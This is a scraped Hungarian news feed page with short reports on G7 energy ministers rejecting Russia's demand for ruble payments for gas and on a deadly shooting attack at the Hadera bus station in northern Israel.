A világ legfejlettebb ipari államait összefogó G7 csoport kormányai felszólítják az országukban orosz energiahordozók importjával foglalkozó vállalatokat, hogy ne fizessenek rubelben az érvényes szerződések alapján Oroszországtól vásárolt földgázért – jelentette be a német gazdasági és klímavédelmi miniszter. Robert Habeck elmondta, hogy a G7 csoport soros elnökségét betöltő Németország képviseletében összehívta a hetek energiaügyekben illetékes minisztereit, hogy egységes, összehangolt választ adjanak a Kreml által barátságtalannak minősített országokra vonatkozó rubelalapú elszámolási rendszer bevezetésére. Az online tanácskozáson teljes egyetértés volt arról, hogy Moszkva lépése az érvényes földgázszállítási szerződések “egyoldalú és egyértelmű megsértése” – mondta a miniszter. A G7 csoport az Egyesült Államokat, Franciaországot, Japánt, Kanadát, Nagy-Britanniát, Németországot és Olaszországot, valamint az Európai Uniót mint nemzetek feletti intézményt fogja össze.

The post Orosz agresszió: Kijev nem tárgyal a “nácitlanításról”, a demilitarizálásról és az orosz nyelv védelméről appeared first on .

Agyonlőtt két embert, hetet pedig megsebesített két merénylő az észak-izraeli Haderán, a támadókat lelőtték – jelentette a Kan közszolgálati rádió.

Hadera városközpontjában, a központi buszpályaudvarnál, két merénylő automata fegyverekkel tüzet nyitott az ott tartózkodó rendőrökre és civilekre. A közelben lévő határőr katonák meghallották a lövéseket, a helyszínre siettek, és agyonlőtték a támadókat. Hét sérültet a közeli Hillel Kórházba szállítottak. Közülük ketten súlyosan megsebesültek, hárman közepesen, ketten pedig könnyebben sérültek meg a rádiónak nyilatkozó orvos szerint.

“Ez egy nagyon súlyos incidens. (…) Két eszméletlen ember is volt a terepen életjelek nélkül, náluk, sajnos, csak a halál beálltát tudtuk megállapítani” – nyilatkozta egy mentős a Jediót Ahronót című újság hírportáljának, a ynetnek. A merénylők az észak izraeli Umm al-Fahem nevű városból autón érkeztek Haderára, arab nemzetiségű izraeli állampolgárok. A Hamász és az Iszlám Dzsihád nevű iszlamista terrorszervezetek üdvözölték az iszlám böjti hónap, a ramadán előtt egy héttel elkövetett merényletet.

Múlt héten Dél-Izraelben Beér-Seván történt hasonló, akkor négy emberéletet kioltó merénylet, melyet egy, a Negev-sivatagban élő, szintén arab nemzetiségű izraeli állampolgár hajtott végre.

The post Két terrorista agyonlőtt két embert Izraelben, hetet megsebesített appeared first on .